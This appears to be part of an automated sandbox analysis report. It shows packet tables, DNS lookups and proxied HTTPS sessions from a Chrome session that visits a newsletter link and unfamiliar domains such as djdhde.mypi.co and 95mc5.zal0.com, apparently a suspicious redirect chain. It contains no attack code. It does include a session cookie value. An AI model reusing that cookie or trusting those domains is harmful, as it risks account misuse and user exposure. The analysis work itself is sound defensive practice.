                              Feb 7, 2024 22:34:31.522109985 CET49744443192.168.2.423.33.136.127
                              Feb 7, 2024 22:34:31.522119999 CET4434974423.33.136.127192.168.2.4
                              Feb 7, 2024 22:34:31.597183943 CET49745443192.168.2.435.190.80.1
                              Feb 7, 2024 22:34:31.597237110 CET4434974535.190.80.1192.168.2.4
                              Feb 7, 2024 22:34:31.597297907 CET49745443192.168.2.435.190.80.1
                              Feb 7, 2024 22:34:31.597829103 CET49745443192.168.2.435.190.80.1
                              Feb 7, 2024 22:34:31.597852945 CET4434974535.190.80.1192.168.2.4
                              Feb 7, 2024 22:34:31.738187075 CET4434974423.33.136.127192.168.2.4
                              Feb 7, 2024 22:34:31.740392923 CET49744443192.168.2.423.33.136.127
                              Feb 7, 2024 22:34:31.740392923 CET49744443192.168.2.423.33.136.127
                              Feb 7, 2024 22:34:31.740411043 CET4434974423.33.136.127192.168.2.4
                              Feb 7, 2024 22:34:31.740612030 CET4434974423.33.136.127192.168.2.4
                              Feb 7, 2024 22:34:31.742259026 CET49744443192.168.2.423.33.136.127
                              Feb 7, 2024 22:34:31.789902925 CET4434974423.33.136.127192.168.2.4
                              Feb 7, 2024 22:34:31.821568012 CET4434974535.190.80.1192.168.2.4
                              Feb 7, 2024 22:34:31.822043896 CET49745443192.168.2.435.190.80.1
                              Feb 7, 2024 22:34:31.822078943 CET4434974535.190.80.1192.168.2.4
                              Feb 7, 2024 22:34:31.823009014 CET4434974535.190.80.1192.168.2.4
                              Feb 7, 2024 22:34:31.823077917 CET49745443192.168.2.435.190.80.1
                              Feb 7, 2024 22:34:31.826076984 CET49745443192.168.2.435.190.80.1
                              Feb 7, 2024 22:34:31.826133013 CET4434974535.190.80.1192.168.2.4
                              Feb 7, 2024 22:34:31.826570034 CET49745443192.168.2.435.190.80.1
                              Feb 7, 2024 22:34:31.826575994 CET4434974535.190.80.1192.168.2.4
                              Feb 7, 2024 22:34:31.867607117 CET49745443192.168.2.435.190.80.1
                              Feb 7, 2024 22:34:31.940753937 CET4434974423.33.136.127192.168.2.4
                              Feb 7, 2024 22:34:31.940917015 CET4434974423.33.136.127192.168.2.4
                              Feb 7, 2024 22:34:31.940973043 CET49744443192.168.2.423.33.136.127
                              Feb 7, 2024 22:34:31.958427906 CET49744443192.168.2.423.33.136.127
                              Feb 7, 2024 22:34:31.958451033 CET4434974423.33.136.127192.168.2.4
                              Feb 7, 2024 22:34:32.050194025 CET4434974535.190.80.1192.168.2.4
                              Feb 7, 2024 22:34:32.050376892 CET4434974535.190.80.1192.168.2.4
                              Feb 7, 2024 22:34:32.050570965 CET49745443192.168.2.435.190.80.1
                              Feb 7, 2024 22:34:32.051033020 CET49745443192.168.2.435.190.80.1
                              Feb 7, 2024 22:34:32.051053047 CET4434974535.190.80.1192.168.2.4
                              Feb 7, 2024 22:34:32.053257942 CET49746443192.168.2.435.190.80.1
                              Feb 7, 2024 22:34:32.053343058 CET4434974635.190.80.1192.168.2.4
                              Feb 7, 2024 22:34:32.053421021 CET49746443192.168.2.435.190.80.1
                              Feb 7, 2024 22:34:32.054230928 CET49746443192.168.2.435.190.80.1
                              Feb 7, 2024 22:34:32.054266930 CET4434974635.190.80.1192.168.2.4
                              Feb 7, 2024 22:34:32.269828081 CET4434974635.190.80.1192.168.2.4
                              Feb 7, 2024 22:34:32.270133972 CET49746443192.168.2.435.190.80.1
                              Feb 7, 2024 22:34:32.270194054 CET4434974635.190.80.1192.168.2.4
                              Feb 7, 2024 22:34:32.270541906 CET4434974635.190.80.1192.168.2.4
                              Feb 7, 2024 22:34:32.271069050 CET49746443192.168.2.435.190.80.1
                              Feb 7, 2024 22:34:32.271133900 CET4434974635.190.80.1192.168.2.4
                              Feb 7, 2024 22:34:32.271364927 CET49746443192.168.2.435.190.80.1
                              Feb 7, 2024 22:34:32.313920021 CET4434974635.190.80.1192.168.2.4
                              Feb 7, 2024 22:34:32.502713919 CET4434974635.190.80.1192.168.2.4
                              Feb 7, 2024 22:34:32.502971888 CET49746443192.168.2.435.190.80.1
                              Feb 7, 2024 22:34:32.503002882 CET4434974635.190.80.1192.168.2.4
                              Feb 7, 2024 22:34:32.503058910 CET49746443192.168.2.435.190.80.1
                              Feb 7, 2024 22:34:41.232321978 CET4434974364.233.185.99192.168.2.4
                              Feb 7, 2024 22:34:41.232480049 CET4434974364.233.185.99192.168.2.4
                              Feb 7, 2024 22:34:41.232810974 CET49743443192.168.2.464.233.185.99
                              Feb 7, 2024 22:34:42.429086924 CET49743443192.168.2.464.233.185.99
                              Feb 7, 2024 22:34:42.429162025 CET4434974364.233.185.99192.168.2.4
                              Feb 7, 2024 22:34:43.376070976 CET44349734104.18.69.40192.168.2.4
                              Feb 7, 2024 22:34:43.376302958 CET44349734104.18.69.40192.168.2.4
                              Feb 7, 2024 22:34:43.376394033 CET49734443192.168.2.4104.18.69.40
                              Feb 7, 2024 22:34:44.320588112 CET49734443192.168.2.4104.18.69.40
                              Feb 7, 2024 22:34:44.320669889 CET44349734104.18.69.40192.168.2.4
                              Feb 7, 2024 22:34:46.128345966 CET44349742104.21.42.31192.168.2.4
                              Feb 7, 2024 22:34:46.128515959 CET44349742104.21.42.31192.168.2.4
                              Feb 7, 2024 22:34:46.128582001 CET49742443192.168.2.4104.21.42.31
                              Feb 7, 2024 22:34:46.422528028 CET49742443192.168.2.4104.21.42.31
                              Feb 7, 2024 22:34:46.422544956 CET44349742104.21.42.31192.168.2.4
                              Feb 7, 2024 22:34:50.955089092 CET804972369.164.42.0192.168.2.4
                              Feb 7, 2024 22:34:50.955367088 CET4972380192.168.2.469.164.42.0
                              Feb 7, 2024 22:34:50.955367088 CET4972380192.168.2.469.164.42.0
                              Feb 7, 2024 22:34:51.260101080 CET4972380192.168.2.469.164.42.0
                              Feb 7, 2024 22:34:51.361747980 CET804972369.164.42.0192.168.2.4
                              Feb 7, 2024 22:35:05.396544933 CET804972469.164.42.0192.168.2.4
                              Feb 7, 2024 22:35:05.396665096 CET4972480192.168.2.469.164.42.0
                              Feb 7, 2024 22:35:05.396893024 CET4972480192.168.2.469.164.42.0
                              Feb 7, 2024 22:35:05.498575926 CET804972469.164.42.0192.168.2.4
                              Feb 7, 2024 22:35:30.938322067 CET49755443192.168.2.464.233.185.99
                              Feb 7, 2024 22:35:30.938358068 CET4434975564.233.185.99192.168.2.4
                              Feb 7, 2024 22:35:30.938440084 CET49755443192.168.2.464.233.185.99
                              Feb 7, 2024 22:35:30.939140081 CET49755443192.168.2.464.233.185.99
                              Feb 7, 2024 22:35:30.939156055 CET4434975564.233.185.99192.168.2.4
                              Feb 7, 2024 22:35:31.152628899 CET4434975564.233.185.99192.168.2.4
                              Feb 7, 2024 22:35:31.153719902 CET49755443192.168.2.464.233.185.99
                              Feb 7, 2024 22:35:31.153747082 CET4434975564.233.185.99192.168.2.4
                              Feb 7, 2024 22:35:31.154050112 CET4434975564.233.185.99192.168.2.4
                              Feb 7, 2024 22:35:31.155335903 CET49755443192.168.2.464.233.185.99
                              Feb 7, 2024 22:35:31.155402899 CET4434975564.233.185.99192.168.2.4
                              Feb 7, 2024 22:35:31.198303938 CET49755443192.168.2.464.233.185.99
                              Feb 7, 2024 22:35:41.163213968 CET4434975564.233.185.99192.168.2.4
                              Feb 7, 2024 22:35:41.163305044 CET4434975564.233.185.99192.168.2.4
                              Feb 7, 2024 22:35:41.163362980 CET49755443192.168.2.464.233.185.99
                              Feb 7, 2024 22:35:42.439505100 CET49755443192.168.2.464.233.185.99
                              Feb 7, 2024 22:35:42.439526081 CET4434975564.233.185.99192.168.2.4
                              Feb 7, 2024 22:35:55.650479078 CET49756443192.168.2.474.125.136.100
                              Feb 7, 2024 22:35:55.650542974 CET4434975674.125.136.100192.168.2.4
                              Feb 7, 2024 22:35:55.650618076 CET49756443192.168.2.474.125.136.100
                              Feb 7, 2024 22:35:55.650934935 CET49756443192.168.2.474.125.136.100
                              Feb 7, 2024 22:35:55.650959969 CET4434975674.125.136.100192.168.2.4
                              Feb 7, 2024 22:35:55.867805004 CET4434975674.125.136.100192.168.2.4
                              Feb 7, 2024 22:35:55.868092060 CET49756443192.168.2.474.125.136.100
                              Feb 7, 2024 22:35:55.868122101 CET4434975674.125.136.100192.168.2.4
                              Feb 7, 2024 22:35:55.868599892 CET4434975674.125.136.100192.168.2.4
                              Feb 7, 2024 22:35:55.868779898 CET49756443192.168.2.474.125.136.100
                              Feb 7, 2024 22:35:55.869201899 CET4434975674.125.136.100192.168.2.4
                              Feb 7, 2024 22:35:55.869265079 CET49756443192.168.2.474.125.136.100
                              Feb 7, 2024 22:35:55.870182037 CET49756443192.168.2.474.125.136.100
                              Feb 7, 2024 22:35:55.870258093 CET4434975674.125.136.100192.168.2.4
                              Feb 7, 2024 22:35:55.870384932 CET49756443192.168.2.474.125.136.100
                              Feb 7, 2024 22:35:55.870413065 CET4434975674.125.136.100192.168.2.4
                              Feb 7, 2024 22:35:55.917886972 CET49756443192.168.2.474.125.136.100
                              Feb 7, 2024 22:35:56.087742090 CET4434975674.125.136.100192.168.2.4
                              Feb 7, 2024 22:35:56.089097977 CET4434975674.125.136.100192.168.2.4
                              Feb 7, 2024 22:35:56.089222908 CET49756443192.168.2.474.125.136.100
                              Feb 7, 2024 22:35:56.089323044 CET49756443192.168.2.474.125.136.100
                              Feb 7, 2024 22:35:56.089360952 CET4434975674.125.136.100192.168.2.4

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Feb 7, 2024 22:34:26.283444881 CET5126053192.168.2.41.1.1.1
                              Feb 7, 2024 22:34:26.283595085 CET6121953192.168.2.41.1.1.1
                              Feb 7, 2024 22:34:26.284126043 CET5673153192.168.2.41.1.1.1
                              Feb 7, 2024 22:34:26.284288883 CET5804753192.168.2.41.1.1.1
                              Feb 7, 2024 22:34:26.390809059 CET53628261.1.1.1192.168.2.4
                              Feb 7, 2024 22:34:26.400612116 CET53512601.1.1.1192.168.2.4
                              Feb 7, 2024 22:34:26.401341915 CET53612191.1.1.1192.168.2.4
                              Feb 7, 2024 22:34:26.401665926 CET53580471.1.1.1192.168.2.4
                              Feb 7, 2024 22:34:26.401770115 CET53567311.1.1.1192.168.2.4
                              Feb 7, 2024 22:34:27.034881115 CET53559921.1.1.1192.168.2.4
                              Feb 7, 2024 22:34:27.994453907 CET6447953192.168.2.41.1.1.1
                              Feb 7, 2024 22:34:27.994723082 CET6119353192.168.2.41.1.1.1
                              Feb 7, 2024 22:34:28.112004995 CET53644791.1.1.1192.168.2.4
                              Feb 7, 2024 22:34:28.112869978 CET53611931.1.1.1192.168.2.4
                              Feb 7, 2024 22:34:28.709810972 CET5373553192.168.2.41.1.1.1
                              Feb 7, 2024 22:34:28.710160017 CET5769453192.168.2.41.1.1.1
                              Feb 7, 2024 22:34:28.897871017 CET53537351.1.1.1192.168.2.4
                              Feb 7, 2024 22:34:29.147142887 CET53576941.1.1.1192.168.2.4
                              Feb 7, 2024 22:34:30.288830996 CET5325553192.168.2.41.1.1.1
                              Feb 7, 2024 22:34:30.290024042 CET5977053192.168.2.41.1.1.1
                              Feb 7, 2024 22:34:30.410244942 CET53597701.1.1.1192.168.2.4
                              Feb 7, 2024 22:34:30.471610069 CET53532551.1.1.1192.168.2.4
                              Feb 7, 2024 22:34:30.894057035 CET5242153192.168.2.41.1.1.1
                              Feb 7, 2024 22:34:30.896900892 CET5915753192.168.2.41.1.1.1
                              Feb 7, 2024 22:34:31.011517048 CET53524211.1.1.1192.168.2.4
                              Feb 7, 2024 22:34:31.015466928 CET53591571.1.1.1192.168.2.4
                              Feb 7, 2024 22:34:31.468902111 CET5979953192.168.2.41.1.1.1
                              Feb 7, 2024 22:34:31.469491959 CET5670753192.168.2.41.1.1.1
                              Feb 7, 2024 22:34:31.586766005 CET53567071.1.1.1192.168.2.4
                              Feb 7, 2024 22:34:31.586988926 CET53597991.1.1.1192.168.2.4
                              Feb 7, 2024 22:34:44.439075947 CET53636931.1.1.1192.168.2.4
                              Feb 7, 2024 22:34:52.064100027 CET138138192.168.2.4192.168.2.255
                              Feb 7, 2024 22:35:03.192002058 CET53597701.1.1.1192.168.2.4
                              Feb 7, 2024 22:35:26.101306915 CET53611151.1.1.1192.168.2.4
                              Feb 7, 2024 22:35:26.193505049 CET53548601.1.1.1192.168.2.4
                              Feb 7, 2024 22:35:54.740895033 CET53643631.1.1.1192.168.2.4
                              Feb 7, 2024 22:35:55.532114983 CET5157253192.168.2.41.1.1.1
                              Feb 7, 2024 22:35:55.532180071 CET6440253192.168.2.41.1.1.1
                              Feb 7, 2024 22:35:55.649836063 CET53515721.1.1.1192.168.2.4
                              Feb 7, 2024 22:35:55.650137901 CET53644021.1.1.1192.168.2.4

                              ICMP Packets

                              TimestampSource IPDest IPChecksumCodeType
                              Feb 7, 2024 22:34:29.147259951 CET192.168.2.41.1.1.1c221(Port unreachable)Destination Unreachable

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Feb 7, 2024 22:34:26.283444881 CET192.168.2.41.1.1.10x321aStandard query (0)clients2.google.comA (IP address)IN (0x0001)false
                              Feb 7, 2024 22:34:26.283595085 CET192.168.2.41.1.1.10x9823Standard query (0)clients2.google.com65IN (0x0001)false
                              Feb 7, 2024 22:34:26.284126043 CET192.168.2.41.1.1.10xf881Standard query (0)accounts.google.comA (IP address)IN (0x0001)false
                              Feb 7, 2024 22:34:26.284288883 CET192.168.2.41.1.1.10x7cdbStandard query (0)accounts.google.com65IN (0x0001)false
                              Feb 7, 2024 22:34:27.994453907 CET192.168.2.41.1.1.10xc7eaStandard query (0)link.mail.beehiiv.comA (IP address)IN (0x0001)false
                              Feb 7, 2024 22:34:27.994723082 CET192.168.2.41.1.1.10x59e0Standard query (0)link.mail.beehiiv.com65IN (0x0001)false
                              Feb 7, 2024 22:34:28.709810972 CET192.168.2.41.1.1.10x4689Standard query (0)djdhde.mypi.coA (IP address)IN (0x0001)false
                              Feb 7, 2024 22:34:28.710160017 CET192.168.2.41.1.1.10xd1f4Standard query (0)djdhde.mypi.co65IN (0x0001)false
                              Feb 7, 2024 22:34:30.288830996 CET192.168.2.41.1.1.10xa650Standard query (0)95mc5.zal0.comA (IP address)IN (0x0001)false
                              Feb 7, 2024 22:34:30.290024042 CET192.168.2.41.1.1.10x9f67Standard query (0)95mc5.zal0.com65IN (0x0001)false
                              Feb 7, 2024 22:34:30.894057035 CET192.168.2.41.1.1.10xf6b1Standard query (0)www.google.comA (IP address)IN (0x0001)false
                              Feb 7, 2024 22:34:30.896900892 CET192.168.2.41.1.1.10xa153Standard query (0)www.google.com65IN (0x0001)false
                              Feb 7, 2024 22:34:31.468902111 CET192.168.2.41.1.1.10x8477Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                              Feb 7, 2024 22:34:31.469491959 CET192.168.2.41.1.1.10xad51Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                              Feb 7, 2024 22:35:55.532114983 CET192.168.2.41.1.1.10xd444Standard query (0)clients1.google.comA (IP address)IN (0x0001)false
                              Feb 7, 2024 22:35:55.532180071 CET192.168.2.41.1.1.10x182cStandard query (0)clients1.google.com65IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Feb 7, 2024 22:34:26.400612116 CET1.1.1.1192.168.2.40x321aNo error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                              Feb 7, 2024 22:34:26.400612116 CET1.1.1.1192.168.2.40x321aNo error (0)clients.l.google.com173.194.219.138A (IP address)IN (0x0001)false
                              Feb 7, 2024 22:34:26.400612116 CET1.1.1.1192.168.2.40x321aNo error (0)clients.l.google.com173.194.219.139A (IP address)IN (0x0001)false
                              Feb 7, 2024 22:34:26.400612116 CET1.1.1.1192.168.2.40x321aNo error (0)clients.l.google.com173.194.219.102A (IP address)IN (0x0001)false
                              Feb 7, 2024 22:34:26.400612116 CET1.1.1.1192.168.2.40x321aNo error (0)clients.l.google.com173.194.219.101A (IP address)IN (0x0001)false
                              Feb 7, 2024 22:34:26.400612116 CET1.1.1.1192.168.2.40x321aNo error (0)clients.l.google.com173.194.219.113A (IP address)IN (0x0001)false
                              Feb 7, 2024 22:34:26.400612116 CET1.1.1.1192.168.2.40x321aNo error (0)clients.l.google.com173.194.219.100A (IP address)IN (0x0001)false
                              Feb 7, 2024 22:34:26.401341915 CET1.1.1.1192.168.2.40x9823No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                              Feb 7, 2024 22:34:26.401770115 CET1.1.1.1192.168.2.40xf881No error (0)accounts.google.com74.125.138.84A (IP address)IN (0x0001)false
                              Feb 7, 2024 22:34:28.112004995 CET1.1.1.1192.168.2.40xc7eaNo error (0)link.mail.beehiiv.com104.18.69.40A (IP address)IN (0x0001)false
                              Feb 7, 2024 22:34:28.112004995 CET1.1.1.1192.168.2.40xc7eaNo error (0)link.mail.beehiiv.com104.18.68.40A (IP address)IN (0x0001)false
                              Feb 7, 2024 22:34:28.112869978 CET1.1.1.1192.168.2.40x59e0No error (0)link.mail.beehiiv.com65IN (0x0001)false
                              Feb 7, 2024 22:34:28.897871017 CET1.1.1.1192.168.2.40x4689No error (0)djdhde.mypi.co23.237.26.135A (IP address)IN (0x0001)false
                              Feb 7, 2024 22:34:30.410244942 CET1.1.1.1192.168.2.40x9f67No error (0)95mc5.zal0.com65IN (0x0001)false
                              Feb 7, 2024 22:34:30.471610069 CET1.1.1.1192.168.2.40xa650No error (0)95mc5.zal0.com104.21.42.31A (IP address)IN (0x0001)false
                              Feb 7, 2024 22:34:30.471610069 CET1.1.1.1192.168.2.40xa650No error (0)95mc5.zal0.com172.67.199.185A (IP address)IN (0x0001)false
                              Feb 7, 2024 22:34:31.011517048 CET1.1.1.1192.168.2.40xf6b1No error (0)www.google.com64.233.185.99A (IP address)IN (0x0001)false
                              Feb 7, 2024 22:34:31.011517048 CET1.1.1.1192.168.2.40xf6b1No error (0)www.google.com64.233.185.105A (IP address)IN (0x0001)false
                              Feb 7, 2024 22:34:31.011517048 CET1.1.1.1192.168.2.40xf6b1No error (0)www.google.com64.233.185.103A (IP address)IN (0x0001)false
                              Feb 7, 2024 22:34:31.011517048 CET1.1.1.1192.168.2.40xf6b1No error (0)www.google.com64.233.185.104A (IP address)IN (0x0001)false
                              Feb 7, 2024 22:34:31.011517048 CET1.1.1.1192.168.2.40xf6b1No error (0)www.google.com64.233.185.147A (IP address)IN (0x0001)false
                              Feb 7, 2024 22:34:31.011517048 CET1.1.1.1192.168.2.40xf6b1No error (0)www.google.com64.233.185.106A (IP address)IN (0x0001)false
                              Feb 7, 2024 22:34:31.015466928 CET1.1.1.1192.168.2.40xa153No error (0)www.google.com65IN (0x0001)false
                              Feb 7, 2024 22:34:31.586988926 CET1.1.1.1192.168.2.40x8477No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                              Feb 7, 2024 22:34:44.833103895 CET1.1.1.1192.168.2.40x877No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                              Feb 7, 2024 22:34:44.833103895 CET1.1.1.1192.168.2.40x877No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                              Feb 7, 2024 22:34:57.722835064 CET1.1.1.1192.168.2.40xf608No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                              Feb 7, 2024 22:34:57.722835064 CET1.1.1.1192.168.2.40xf608No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                              Feb 7, 2024 22:35:18.275068998 CET1.1.1.1192.168.2.40xad3eNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                              Feb 7, 2024 22:35:18.275068998 CET1.1.1.1192.168.2.40xad3eNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                              Feb 7, 2024 22:35:38.881129980 CET1.1.1.1192.168.2.40x3719No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                              Feb 7, 2024 22:35:38.881129980 CET1.1.1.1192.168.2.40x3719No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                              Feb 7, 2024 22:35:55.649836063 CET1.1.1.1192.168.2.40xd444No error (0)clients1.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                              Feb 7, 2024 22:35:55.649836063 CET1.1.1.1192.168.2.40xd444No error (0)clients.l.google.com74.125.136.100A (IP address)IN (0x0001)false
                              Feb 7, 2024 22:35:55.649836063 CET1.1.1.1192.168.2.40xd444No error (0)clients.l.google.com74.125.136.113A (IP address)IN (0x0001)false
                              Feb 7, 2024 22:35:55.649836063 CET1.1.1.1192.168.2.40xd444No error (0)clients.l.google.com74.125.136.101A (IP address)IN (0x0001)false
                              Feb 7, 2024 22:35:55.649836063 CET1.1.1.1192.168.2.40xd444No error (0)clients.l.google.com74.125.136.139A (IP address)IN (0x0001)false
                              Feb 7, 2024 22:35:55.649836063 CET1.1.1.1192.168.2.40xd444No error (0)clients.l.google.com74.125.136.138A (IP address)IN (0x0001)false
                              Feb 7, 2024 22:35:55.649836063 CET1.1.1.1192.168.2.40xd444No error (0)clients.l.google.com74.125.136.102A (IP address)IN (0x0001)false
                              Feb 7, 2024 22:35:55.650137901 CET1.1.1.1192.168.2.40x182cNo error (0)clients1.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • clients2.google.com
                              • accounts.google.com
                              • link.mail.beehiiv.com
                              • djdhde.mypi.co
                              • https:
                                • 95mc5.zal0.com
                              • fs.microsoft.com
                              • a.nel.cloudflare.com
                              • clients1.google.com

                              HTTPS Proxied Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.449731173.194.219.1384433716C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-07 21:34:26 UTC752OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                              Host: clients2.google.com
                              Connection: keep-alive
                              X-Goog-Update-Interactivity: fg
                              X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                              X-Goog-Update-Updater: chromecrx-117.0.5938.132
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: empty
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-07 21:34:26 UTC732INHTTP/1.1 200 OK
                              Content-Security-Policy: script-src 'report-sample' 'nonce-NblJaqbmR3hmE8AIiLtQ9g' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                              Pragma: no-cache
                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                              Date: Wed, 07 Feb 2024 21:34:26 GMT
                              Content-Type: text/xml; charset=UTF-8
                              X-Daynum: 6246
                              X-Daystart: 48866
                              X-Content-Type-Options: nosniff
                              X-Frame-Options: SAMEORIGIN
                              X-XSS-Protection: 1; mode=block
                              Server: GSE
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Accept-Ranges: none
                              Vary: Accept-Encoding
                              Connection: close
                              Transfer-Encoding: chunked
                              2024-02-07 21:34:26 UTC520INData Raw: 32 63 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 36 32 34 36 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 34 38 38 36 36 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                              Data Ascii: 2c9<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="6246" elapsed_seconds="48866"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                              2024-02-07 21:34:26 UTC200INData Raw: 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f 67 75 70 64 61 74 65 3e 0d 0a
                              Data Ascii: 723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></gupdate>
                              2024-02-07 21:34:26 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.44973074.125.138.844433716C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-07 21:34:26 UTC680OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                              Host: accounts.google.com
                              Connection: keep-alive
                              Content-Length: 1
                              Origin: https://www.google.com
                              Content-Type: application/x-www-form-urlencoded
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: empty
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: NID=511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk
                              2024-02-07 21:34:26 UTC1OUTData Raw: 20
                              Data Ascii:
                              2024-02-07 21:34:26 UTC1799INHTTP/1.1 200 OK
                              Content-Type: application/json; charset=utf-8
                              Access-Control-Allow-Origin: https://www.google.com
                              Access-Control-Allow-Credentials: true
                              X-Content-Type-Options: nosniff
                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                              Pragma: no-cache
                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                              Date: Wed, 07 Feb 2024 21:34:26 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Content-Security-Policy: script-src 'report-sample' 'nonce-bmjaN4uxOu8Enl03x0poNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                              Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist
                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                              Cross-Origin-Opener-Policy: same-origin
